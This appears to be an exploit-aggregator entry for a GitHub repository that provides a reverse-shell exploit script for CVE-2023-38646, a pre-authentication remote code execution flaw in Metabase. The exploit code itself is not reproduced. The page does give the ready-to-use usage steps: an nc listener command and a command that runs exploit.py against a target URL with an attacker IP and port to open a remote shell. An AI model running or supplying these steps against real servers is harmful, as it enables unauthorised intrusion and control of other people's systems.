POC details: 720c60725b0410d36771378fe02cfa9de77597d9

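Source
Related vulnerability
Title: Metabase security vulnerability (CVE-2023-38646)
Description: Metabase is an open-source data analytics platform from Metabase, a US company. Metabase versions before 0.46.6.1 and Metabase Enterprise versions before 1.46.6.1 contain a security vulnerability that allows an attacker to execute arbitrary commands on the server with the privileges of the account running the service.
Description
CVE-2023-38646 Unauthenticated RCE vulnerability in Metabase
Introduction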
# CVE-2023-38646-exploit
"This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication."

A quick reverse shell exploit script for CVE-2023-38646.
I did not find this vulnerability, just made the script.


## Usage

    root@box:~/CVE-2023-38646# python3 exploit.py
    
       _______      ________    ___   ___ ___  ____       ____   ___    __ _  _     __
    
    / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \     |___ \ / _ \  / /| || |   / /
    | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
    | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__   _| '_ \
    | |____   \  /  | |____    / /_| |_| / /_ ___) |     ___) | (_) | (_) | | | | (_) |
    \_____|   \/   |______|  |____|\___/____|____/     |____/ \___/ \___/  |_|  \___/
    
    author: c0rnbread
    credits:
    https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
    https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py


    Usage: python3 exploit.py <url> <local-ip> <local-port>
Run it with the base URL and the local IP and port for the reverse shell:
      
    root@box:~/CVE-2023-38646# nc -lvnp 4444
    
    root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444

![image](https://github.com/nickswink/CVE-2023-38646/assets/57839593/33a91801-684c-4021-a8d6-378c4ea39d45)

### Credits
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py

File snapshot

    [4.0K] /data/pocs/720c60725b0410d36771378fe02cfa9de77597d9
    ├── [2.9K] exploit.py
    └── [1.6K] README.md

    0 directories, 2 files